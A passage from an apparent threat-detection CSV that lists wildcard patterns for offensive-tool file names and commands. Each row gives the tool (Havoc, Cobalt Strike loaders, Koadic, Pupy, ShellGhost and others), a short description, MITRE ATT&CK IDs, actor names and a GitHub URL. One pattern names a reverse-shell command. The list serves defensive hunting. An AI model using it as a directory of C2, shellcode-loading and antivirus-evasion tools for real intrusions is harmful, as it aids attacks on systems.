tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" +"*Shellcode.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*shellcode_dll.dll*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,, +"*shellcode_dll\*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A",,"N/A",,, +"*shellcode_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*shellcode_dropper.c*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"*shellcode_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*Shellcode_encryption.exe*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*shellcode_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*shellcode_generator.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*shellcode_generator_help.html*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*shellcode_inject.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*shellcode_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ShellCode_Loader.py*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*shellcode1 += b*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*shellcode20.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" +"*shellcode30.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" +"*shellcode35.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" +"*shellcode40.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" +"*Shellcode-Download_CreateThread_Execution*","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","229","49","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" +"*Shellcode-Downloader-CreateThread-Execution*","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","229","49","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" +"*shellcodeEncryptDecrypt*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*shellcode-exec.ps1*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A",,"N/A",,, +"*shellcodeexec.x32*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*shellcodeexec.x64*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*ShellcodeFluctuation.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*ShellcodeFluctuation64*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*ShellcodeFluctuation86*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*Shellcode-Hide-main*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*Shellcode-Loader-master*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*ShellcodeRDI.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*ShellcodeRDI.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*ShellcodeRDI.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*shellcode-runner.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A",,"N/A",,, +"*ShellcodeTemplate.x64.bin*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*shellcodetester *","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*ShellCodeTester.csproj*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*shellcodetester.exe*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*shellcodetester.git*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*shellcodetester.sh*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*ShellCodeTester.sln*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*shellerator --reverse-shell --lhost * --lport * --type *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ShellGhost.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.exe*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*ShellGhost.sln*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense 